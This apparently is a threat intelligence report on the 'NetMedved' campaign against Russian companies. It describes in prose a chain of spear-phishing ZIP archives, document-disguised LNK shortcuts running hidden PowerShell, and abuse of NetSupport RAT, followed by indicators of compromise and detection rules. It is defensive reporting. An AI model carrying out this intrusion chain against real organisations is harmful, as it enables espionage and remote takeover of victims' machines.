Date Discovered: Late November 2025 Primary Target: Russian Organizations (Construction, Agro-Industry, and other sectors) Main Tool: NetSupport RAT

Threat Profile

Security researchers have identified a previously unknown threat actor dubbed NetMedved (likely translating to “NetBear”). This group has launched a targeted campaign against Russian companies, aiming to infiltrate corporate networks to conduct espionage or deploy further payloads.

Unlike “smash-and-grab” cybercriminals, NetMedved appears to focus on establishing long-term persistence within victim networks using legitimate, dual-use software to blend in with normal administrative traffic.

Tactics, Techniques, and Procedures (TTPs)

1. Initial Access: Targeted Phishing

The attack begins with spear-phishing emails sent to corporate employees.

• Theme: The emails masquerade as legitimate business correspondence, typically “Purchase Requests,” “Orders,” or “Tender Documents.”
• Attachment: The email includes a ZIP archive (e.g., Order_Details.zip or Purchase_Request.zip).

2. Execution: The LNK Decoy

• Deception: Inside the ZIP archive is a malicious .LNK (Shortcut) file. The actor changes the icon of this shortcut to look like a standard PDF or Word document to trick the user.
• Trigger: When the victim double-clicks the LNK file, it does not open a document. Instead, it executes a hidden PowerShell command.

3. Payload Delivery

• Staging: The PowerShell script connects to a remote server controlled by the attacker to download the next stage of the payload.
• Dropper: A loader/dropper script is executed, which retrieves the final malware payload.

4. Command & Control (C2): NetSupport RAT

• Tool: The primary payload is NetSupport Manager, a legitimate remote administration tool widely used by IT support teams.
• Abuse: NetMedved configures this legitimate tool to report back to their own Command & Control infrastructure.
• Persistence: The RAT is installed with a configuration that allows it to run silently in the background, granting the attacker full remote control over the infected machine (file transfer, screen capture, remote shell).
• Evasion: Because NetSupport is a signed, legitimate application, it often bypasses standard antivirus detection that looks for known “malware” signatures.

Indicators of Compromise (IOCs)

File Artifacts

• Malicious Files: Look for ZIP archives containing solitary .LNK files, especially in the Downloads or Temp folders.
• LNK Target Paths: Shortcuts that point to powershell.exe or cmd.exe with arguments to download files from external URLs.
• Payload Directory: Suspected presence of NetSupport Manager files (e.g., client32.exe) in unusual directories such as:
  • %APPDATA%
  • %PROGRAMDATA%
  • C:\Users\Public\

Network Behaviors

• Protocol: Unusual HTTP/HTTPS traffic associated with remote desktop tools.
• Gateway: Connections to external IPs on ports often used by NetSupport (e.g., 443 or proprietary ports if configured) that do not match known corporate remote support infrastructure.

Targeting Scope

• Geography: Russia.
• Sectors: Construction, Agro-Industry, General Enterprise.

Detection Opportunities

• Process Monitoring: Alert on powershell.exe spawned immediately by explorer.exe (user clicking a file) that subsequently initiates a network connection.
• File Analysis: Scan for LNK files that have a “Document” icon (PDF/DOCX) but contain a command-line target.
• Application Whitelisting: Audit the usage of NetSupport Manager (client32.exe). If your organization does not use this software, block it immediately.